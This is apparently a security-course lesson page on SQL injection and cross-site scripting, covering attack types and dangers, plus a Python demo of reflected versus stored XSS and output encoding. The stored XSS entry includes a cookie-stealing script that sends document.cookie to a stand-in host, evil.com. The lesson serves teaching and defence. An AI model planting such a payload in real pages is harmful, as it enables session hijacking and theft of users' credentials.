Day 16, Unit III

SQL Injection & XSS

Web Application Security Testing

Master SQL injection and Cross-Site Scripting vulnerabilities. Learn manual testing techniques, automated tools, and practical exploitation methods for web application security assessment.

Learning Objectives
  • Understand what SQL Injection is and how it works
  • Learn manual SQL injection testing techniques
  • Master sqlmap for automated SQL injection attacks
  • Understand Cross-Site Scripting (XSS) fundamentals
  • Differentiate between Reflected and Stored XSS
  • Use Burp Suite Repeater for web vulnerability testing
  • Identify and exploit SQL injection vulnerabilities
  • Inject and trigger XSS payloads effectively

SQL Injection & XSS Concepts

Understanding web application vulnerabilities

What is SQL Injection?

SQL Injection (SQLi) is a code injection technique that attacks data-driven applications.

How It Works

  • Malicious SQL statements are inserted into an entry field
  • The application's database executes the malicious statements
  • Attackers can bypass authentication, access data, and modify the database
  • Can lead to complete system compromise

Dangers

  • Data theft and exfiltration
  • Database modification or deletion
  • Authentication bypass
  • Privilege escalation
  • Complete system takeover

Impact: One of the most critical web vulnerabilities, ranked #1 in OWASP Top 10

SQL Injection Types

Different categories of SQL injection attacks

Types

In-band SQLi

Attacker receives immediate response

Examples: Union-based SQLi, Error-based SQLi

Blind SQLi

No direct error messages from database

Examples: Boolean-based SQLi, Time-based SQLi

Out-of-band SQLi

Attacker triggers external network connections

Examples: DNS exfiltration, HTTP requests

Cross-Site Scripting (XSS)

Client-side code injection attack where malicious scripts are injected into web applications

How It Works

  • Attacker injects malicious JavaScript into web page
  • Victim's browser executes the malicious script
  • Script runs in context of trusted website
  • Can steal cookies, session tokens, or perform actions

Dangers

  • Session hijacking and theft
  • Credential harvesting
  • Website defacement
  • Malware distribution
  • Phishing attacks

XSS Categories

Different types of XSS attacks

Types

Reflected XSS

Malicious script is reflected off web server to victim

Characteristics: Non-persistent, URL-based, Immediate execution
Example: <script>alert(1)</script> in URL parameter

Stored XSS

Malicious script is permanently stored on target server

Characteristics: Persistent, Stored in database, Affects all users
Example: <script>document.location="http://evil.com/steal?cookie="+document.cookie</script> in comment

DOM-based XSS

Vulnerability exists in client-side code

Characteristics: Client-side only, No server interaction, Modern web applications
Example: Unsafe JavaScript DOM manipulation
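
The difference between the Reflected and Stored categories above, and the effect of HTML-encoding output, shown as an added example that is not part of the original course material. The page-rendering functions, the `CommentBoard` class and the `contains_live_script` check are hypothetical stand-ins for a real application; the test string is the one from the Reflected XSS entry above.

```python
import html

# Test string taken from the page's Reflected XSS example.
PAYLOAD = "<script>alert(1)</script>"

def search_page_vulnerable(query: str) -> str:
    """Reflected: the request parameter is echoed into the response unencoded."""
    return f"<p>Results for: {query}</p>"

def search_page_encoded(query: str) -> str:
    """Same page with HTML-encoding applied when the value is written out."""
    return f"<p>Results for: {html.escape(query)}</p>"

class CommentBoard:
    """Stored: input is saved server-side and rendered for every later viewer."""
    def __init__(self, encode_output: bool):
        self.encode_output = encode_output
        self.comments = []  # stands in for the database table (assumption)

    def post(self, text: str) -> None:
        self.comments.append(text)  # stored exactly as submitted

    def render(self) -> str:
        items = (html.escape(c) if self.encode_output else c for c in self.comments)
        return "<ul>" + "".join(f"<li>{i}</li>" for i in items) + "</ul>"

def contains_live_script(page: str) -> bool:
    """True if the response carries an unencoded <script> tag a browser would parse."""
    return "<script" in page.lower()

def demo() -> dict:
    weak, fixed = CommentBoard(False), CommentBoard(True)
    for board in (weak, fixed):
        board.post("nice article")  # constructed sample comment
        board.post(PAYLOAD)
    return {
        "reflected_vulnerable": contains_live_script(search_page_vulnerable(PAYLOAD)),
        "reflected_encoded": contains_live_script(search_page_encoded(PAYLOAD)),
        # Two separate viewers load the same stored page.
        "stored_vulnerable_views": [contains_live_script(weak.render()) for _ in range(2)],
        "stored_encoded_views": [contains_live_script(fixed.render()) for _ in range(2)],
        "encoded_markup": search_page_encoded(PAYLOAD),
    }

if __name__ == "__main__":
    for key, value in demo().items():
        print(key, "=>", value)
```

The reflected page is only affected on the request that carries the string, while the stored board serves it on every render until the record is removed or the output is encoded.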